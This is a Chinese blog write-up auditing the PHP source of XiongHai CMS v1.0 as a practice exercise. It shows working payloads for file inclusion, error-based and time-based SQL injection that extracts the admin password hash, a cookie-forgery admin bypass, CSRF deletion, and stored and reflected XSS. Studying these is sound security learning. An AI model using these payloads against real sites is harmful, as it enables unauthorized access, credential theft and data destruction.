熊海cms——代码审计

已于 2022-03-10 11:26:30 修改
阅读量3.7k 收藏 14
点赞数 2
分类专栏: # 代码审计 文章标签: 安全
于 2022-03-07 09:54:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123321425
版权

前言

再基本了解了代码审计的方法后,参考各个师傅的博客跟着他们一步一步代码审计。

下载源码:A5源码、站长之家、源码之家、系统官网等。

审计环境

使用小皮面板,新建网站
在这里插入图片描述
接着直接打开网站的install 就可以开始安装了
ps:至于为什么不能用php7.4.3 环境 安装请知道的师傅call 我 万分感谢!

审计过程

先了解文件目录
在这里插入图片描述

admin         --管理后台文件夹
css           --存放css的文件夹
files         --存放页面的文件夹
images        --存放图片的文件夹
inc           --存放网站配置文件的文件夹
install       --网站进行安装的文件夹
seacmseditor  --编辑器文件夹
template      --模板文件夹
upload        --上传功能文件夹
index.php     --网站首页

tip:

下面的payload
r = 引用files文件夹下的文件

0x01 使用seay源代码审计系统进行审计

在这里插入图片描述

扫描到了很多个可疑漏洞,不过工具都有一定的误报,下面我们就逐个进行验证

0x02 /index.php文件包含漏洞

在这里插入图片描述

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

查看源代码,我们发现程序通过GET方法接收文件名,并且只做了一个addslashes

(返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号()、双引号(")、反斜线(**)与
NUL(NULL 字符)。)

,然后直接放在了include函数里面了,相当于引用 files/xxxxx.php 文件,这里如果我们通过其他方法在根目录上传一个脚本就可以直接包含:

在这里插入图片描述

payload:
?r=phpinfo //包含files文件夹下的phpinfo()
?r=../phpinfo  //包含根目录的phpinfo()

在这里插入图片描述
在这里插入图片描述

2.2 /admin/index.php中的文件包含也是类似

源代码

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

在这里插入图片描述

0x03 /admin/files/login.php SQL注入漏洞

查看login.php的源代码

在这里插入图片描述
源码:

<?php 
ob_start();
require '../inc/conn.php';
$login=$_POST['login'];
$user=$_POST['user'];
$password=$_POST['password'];
$checkbox=$_POST['checkbox'];

if ($login<>""){
$query = "SELECT * FROM manage WHERE user='$user'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$users = mysql_fetch_array($result);

if (!mysql_num_rows($result)) {  
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}else{
$passwords=$users['password'];
if(md5($password)<>$passwords){
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;	
	}
//写入登录信息并记住30天
if ($checkbox==1){
setcookie('user',$user,time()+3600*24*30,'/');
}else{
setcookie('user',$user,0,'/');
}
echo "<script>this.location='?r=index'</script>";
exit;
}
exit;
ob_end_flush();
}
?>

直接通过POST方式接收user、password,并且没有做任何过滤。然后先查询用户名,如果用户名存在,就将将POST得到的密码进行md5,然后和数据库中对应的密码进行比较。这样的话,虽然我们可以通过万能密码admin’ or ‘1’='1对用户名绕过,但是密码没有方法绕过,万能密码的方法就不可行了。 不过由于没有做任何过滤,我们还是可以执行SQL语句的

比如:

1' or sleep(10) #

在这里插入图片描述

这样我们就可以进行布尔盲注

经过测试,发现也存在报错注入

payload:

admin' or updatexml(1,concat(0x7e,(select @@version),0x7e),1); #
admin' or updatexml(1,concat(0x7e,(user()),0x7e),1); #
1' or updatexml(1,concat((select concat(0x7e,password) from manage)),0) #
1' or updatexml(1,concat((select concat(password,0x7e) from manage)),0) #
1' or updatexml(1,concat((select concat(0x7e,user) from manage)),0) #


admin' or updatexml(1,concat(0x7e,(select @@version),0x7e),1); #

在这里插入图片描述

admin' or updatexml(1,concat(0x7e,(user()),0x7e),1); #

在这里插入图片描述

1' or updatexml(1,concat((select concat(0x7e,user) from manage)),0) #

在这里插入图片描述

0x04 /admin/files/editcolumn.php、editlink.php、editsoft.php… SQL注入漏洞

在这里插入图片描述
在这里插入图片描述

都是类似的漏洞。POST方式接收了参数之后,没有进行然后过滤,然后直接执行了UPDATE/DELETE/INSERT语句,我们可以直接进行报错注入

payload:

' or updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '

img

0x05 /inc/checklogin.php 越权漏洞

inc目录下的都是配置文件,很重要,要每一个文件都仔细查看。

checklogin.php

[img

<?php
$user=$_COOKIE['user'];
if ($user==""){
header("Location: ?r=login");
exit;	
}
?>

接收cookie中user的内容,如果user字段为空,则跳到登录页面

这样的话,我们打开一个后台页面,抓包,设置cookie中的user字段为admin会怎么样呢?
在这里插入图片描述
在这里插入图片描述

发现我们直接进入了后台,并且只要保证每次cookie中user参数都有值就可以访问后台的所有内容,因此存在垂直越权漏洞。

0x06 CSRF漏洞

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$wzlistopen='class="open"';
$pageyema="?r=wzlist&page=";

$delete=$_GET['delete'];
if ($delete<>""){
$query = "DELETE FROM content WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
echo "<script>alert('亲,ID为".$delete."的内容已经成功删除!');location.href='?r=wzlist'</script>";
exit; 
}
?>

这里的内容管理中有一个删除文章的功能,没有做csrf token、验证码等防护。

点击后抓包得到url

http://www.xh.com/admin/?r=wzlist&delete=15

在这里插入图片描述

退出管理员账号,根据之前的越权漏洞分析,这里应该会转跳到login的界面,试一下,果然如此。

[img
其payload

www.xh.com/admin/?r=wzlist&delete=15

然后我们换个浏览器,来访问这个payload,并且抓包,在Cookie处,添加user的值为admin

在这里插入图片描述
转发:
在这里插入图片描述

0x07 /files/contact.php 存储型XSS漏洞

img
前台留言板没有进行XSS过滤,后台管理界面也没有进行过滤,因此产生了存储型XSS,而且有针对性的攻击管理员,属于比较危险的一类XSS了

关键代码

<li><span>昵称</span><input name="name" type="text" value="<?php echo $_COOKIE['name']?>" /></li>
<li><span>邮箱</span><input name="mail" type="text" value="<?php echo $_COOKIE['mail']?>"/></li>
<li><span>网址</span><input name="url" type="text" value="<?php echo $_COOKIE['url']?>"/></li>
<textarea name="content" cols="" rows=""></textarea>

2./files/controller.php

在这里插入图片描述
应为没有设置第二个参数导致没有过滤
在这里插入图片描述

3./admin/files/manageinfo.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$setopen='class="open"';
$query = "SELECT * FROM manage";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$manage = mysql_fetch_array($resul);

$save=$_POST['save'];

$user=$_POST['user'];
$name=$_POST['name'];
$password=$_POST['password'];
$password2=$_POST['password2'];
$img=$_POST['img'];
$mail=$_POST['mail'];
$qq=$_POST['qq'];

if ($save==1){
	
	
if ($user==""){
echo "<script>alert('抱歉,帐号不能为空。');history.back()</script>";
exit;
	}
	
if ($name==""){
echo "<script>alert('抱歉,名称不能为空。');history.back()</script>";
exit;
	}
if ($password<>$password2){
echo "<script>alert('抱歉,两次密码输入不一致!');history.back()</script>";
exit;
	}

//处理图片上传
if(!empty($_FILES['images']['tmp_name'])){
$query = "SELECT * FROM imageset";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$imageset = mysql_fetch_array($result);
include '../inc/up.class.php';
if (empty($HTTP_POST_FILES['images']['tmp_name']))//判断接收数据是否为空
{
		$tmp = new FileUpload_Single;
		$upload="../upload/touxiang";//图片上传的目录,这里是当前目录下的upload目录,可自已修改
		$tmp -> accessPath =$upload;
		if ( $tmp -> TODO() )
		{
			$filename=$tmp -> newFileName;//生成的文件名
			$filename=$upload.'/'.$filename;
			$imgsms="及图片";
			
		}		
}
}

if ($filename<>""){
$images="img='$filename',";	
}

if ($password<>""){
$password=md5($password);
$password="password='$password',";
}

$query = "UPDATE manage SET 
user='$user',
name='$name',
$password
$images
mail='$mail',
qq='$qq',
date=now()";
@mysql_query($query) or die('修改错误:'.mysql_error());
echo "<script>alert('亲爱的,资料".$imgsms."设置已成功更新!');location.href='?r=manageinfo'</script>"; 
exit;
}
?>

POST传参,但是无任何过滤,直接根数据库进行交互,存在存储型XSS
payload:

<img src=1 onerror=alert(/xss/)>


在这里插入图片描述
在这里插入图片描述

0x08 /files/contact.php 反射型xss

$page=addslashes($_GET['page']); //59行
<?php echo $page?> //139行

在这里插入图片描述
payload:

<img src=1 onerror=alert(/xss/)>

在这里插入图片描述
参考:https://xz.aliyun.com/t/10942#toc-3
https://www.cnblogs.com/vege/p/13453283.html

明月清风~~
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
wuzhicms代码审计
hackzkaq的博客
07-04 572
环境搭建 源码下载官网:https://www.wuzhicms.com/放到本地phpstudy根目录下,访问install路径进行安装。访问后台:访问前台:直接后台挂个链接:漏洞分析 搜索select的时候 发现在mysql.class文件下有一个函数里面有select 并且后面的拼接也没有任何的过滤搜索哪里调用了这个函数,先是在api目录下的sms_check文件中发现调用了get_one函数 并且参数是通过前面的$code拼接。我们可以看到code 先是通过$GLOBALS来获取参数param的值
熊海CMS v1.0
10-08
熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示
熊海个人网站 1.0
04-30
熊海于2014年开发的一套个人网站系统,是我开源的第一款PHP的程序,虽然定位于个人网站系统,但界面及总体风格没有作过多的倾向性。本程序前后台均采用HTML5、CSS3,响应式布局,完美支持各种浏览设备,因为之前写过博客程序,博客程序一直太过于注重功能,从而忽视了内容的重要性,所以这款个人网站程序做出了一些改变,主要突出内容,从而削减一些功能,以简洁轻量为主。
代码审计-熊海CMSv1.0
最新发布
sx____的博客
04-28 314
使用seay代码审计系统进行自动审计,发现有文件包含漏洞、sql注入漏洞和任意文件读取漏洞。
代码审计系列:熊海CMS V1.0 (iseaCMS_1.0)
闵行小鱼塘
07-12 4762
学习练习代码审计,找来据说很多洞对新手友好的 熊海CMS V1.0,15年的CMS
熊海CMS代码审计
weixin_52125240的博客
04-08 4692
熊海CMS代码审计审计准备文件包含漏洞逻辑越权漏洞XSS漏洞SQL注入 前言:也算是第一次代码审计,肯定有很多地方会比较的生疏,也有很多地方不能注意到,所以希望大家也多给建议。 审计准备 我自己安装了phpstudy,然后用phpstudy的环境,来运行熊海的源码。 我们用Seay源代码审计系统先来扫一遍,看看有什么漏洞 扫到的漏洞还挺多的,但是很多都是误报,所以我们一个个去看过来。 文件包含漏洞 <?php //单一入口模式 error_reporting(0); //关闭错误显示 $file=
php代码审计熊海cms代码审计
qq_47289634的博客
09-23 595
后台源码,载入了files/index.php。这段代码可以看出,后台页面应该是/admin/r=index。跟进/inc/checklogin.php,看到只验证了cookie里的user是否不为空。后台栏目编辑处也存在xss,不过是在后台,比较鸡肋,可以自己找下。进入files/index.php查看,引用了这几个文件。测试一下,在网站首页新建一个文件,写上phpinfo。实验,cookie里新增一个user,值随便填。读一下代码,可以看到很明显的一个文件包含。构造漏洞url,代码执行成功。
【PHP代码审计】——开启你的代码审计生涯
Demo不是emo的博客
11-14 4905
感觉最近的网络安全学习遇到了瓶颈,因为我是学习的web安全,所以自然最先学习的就是熟悉owtop10漏洞,并且我当前的专业是软件工程,所以各种计算机语言都接触过,但都学的不深,所以网安学习越深入就越感觉代码能力的重要性,所以我决定将当前的重心转到代码审计上,了解漏洞形成原因的同时,增加自己对php语言的理解,加油
Java 代码审计常用漏洞总结
LANXIAMAO的博客
06-18 979
但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列化产生非预期的对象,在此过程中执行构造的任意代码。download 函数把 filePath 处的文件写到 http 响应中,在整个流程中并没有对文件名的合法性进行检查,存在任意文件下载漏洞,如通过把 affixalName 的值设置。主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯:跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。
「Java代码审计」华夏ERP3.0代码审计
橙留香Park的博客
09-22 3393
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ..
[代码审计]—熊海cms
Sentiment的博客
04-18 1322
环境搭建 phpstudy新建个站,放入代码 创建数据库 访问install 确认后变成空白页面,于是打开源文件查看后 发现是由于php版本过高,部分函数无法使用导致 修改php版本后访问install搭建成功 在访问files目录时报错 原因是在文件包含的路径错误,包含inc/301.php会包含files目录下的inc/301.php,但inc和files属于同级目录,不在files中所以会报错,在前边加上…/即可 后来发现该文件夹下的所有文件都有该问题,如果一个个加…/未免有些麻烦,所以
熊海CMS_V1.zip
09-28
熊海CMS_V1.zip
熊海CMS v1.0.rar
07-06
熊海CMS更新说明: 2015-03-21 19:45 修复linux服务器上后台登录空白的问题。   熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。   目前系统已经集成:代码高亮、...
基于PHP的熊海CMS网站综合管理系统源码.zip
01-05
基于PHP的熊海CMS网站综合管理系统源码.zip
基于PHP的熊海CMS 网站综合管理系统.zip
08-29
基于PHP的熊海CMS 网站综合管理系统.zip
熊海CMS 靶场
diaobusi的博客
11-11 826
初步了解cms,Content Management System 内容管理系统。它是一种用于创建、编辑、管理和发布内容的软件程序或工具。内容管理系统通常用于网站、博客、企业内部系统等各种应用中,可以帮助用户管理和发布各种类型的内容,如文章、图片、视频、文件等。进行PHP代码审计代码审计是一种白盒测试,以发现程序错误,安全漏洞和违反程序规范为目标的源代码分析。软件代码审计是对编程项目中源代码的全面分析,旨在发现错误,安全漏洞或违反编程约定。它是防御性编程范例的一个组成部分,它试图在软件发布之前减少错误。
easycms v5.5 分析 | Bugku S3 AWD排位赛
qq_56313338的博客
09-15 1008
bugku awd中的cmseasy 5.5代码审计,分析路由规则,sql注入分析,不登陆进行文件上传getshell
如何审计一个冷门的cms
YJ_12340的博客
11-23 308
刚开始代码审计多多少少会有种无从下手的感觉,想要通过自己的代码审计能力直接审计出漏洞未免有些困难。但是如果直接拿到一个cms开始审,刚开始可能富有激情,可是越审到后面就会越怀疑自己,然后放弃代码审计。造成这样的现象的原因便是:不知道自己到底能不能审到漏洞。那如何审出一个很少人知道,并且肯定存在的洞呢?本文介绍的办法就是:上cnvd看看以前师傅提交的洞,虽然大多数的洞都是不公开的,但是我们还是可以根据cnvd给的一点点信息来尝试复现。
代码审计熊海cms Cooike欺骗进入后台复现
qq_43233085的博客
03-16 855
代码审计熊海cms Cooike欺骗进入后台复现熊海cms代码审计漏洞复现 熊海cms 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 代码审计 问题出在inc->checklogin.php文件,具体代码如下: <?php $...
熊海cms1.0 漏洞
07-25
熊海CMS 1.0存在一些漏洞。具体的漏洞信息可以在一些安全研究人员的博客和文章中找到。这些漏洞可能包括代码审计中发现的安全问题,比如任意文件上传漏洞和SSRF绕过漏洞。\[1\]\[3\]这些漏洞可能会导致攻击者能够执行恶意代码、上传恶意文件或绕过安全限制。因此,如果你正在使用熊海CMS 1.0,建议及时升级到最新版本或采取其他安全措施来保护你的网站免受潜在的攻击。 #### 引用[.reference_title] - *1* *3* [熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞](https://blog.csdn.net/qq_28624871/article/details/114745946)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [熊海CMS 1.0代码审计漏洞集合](https://blog.csdn.net/qq_44159028/article/details/120530969)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值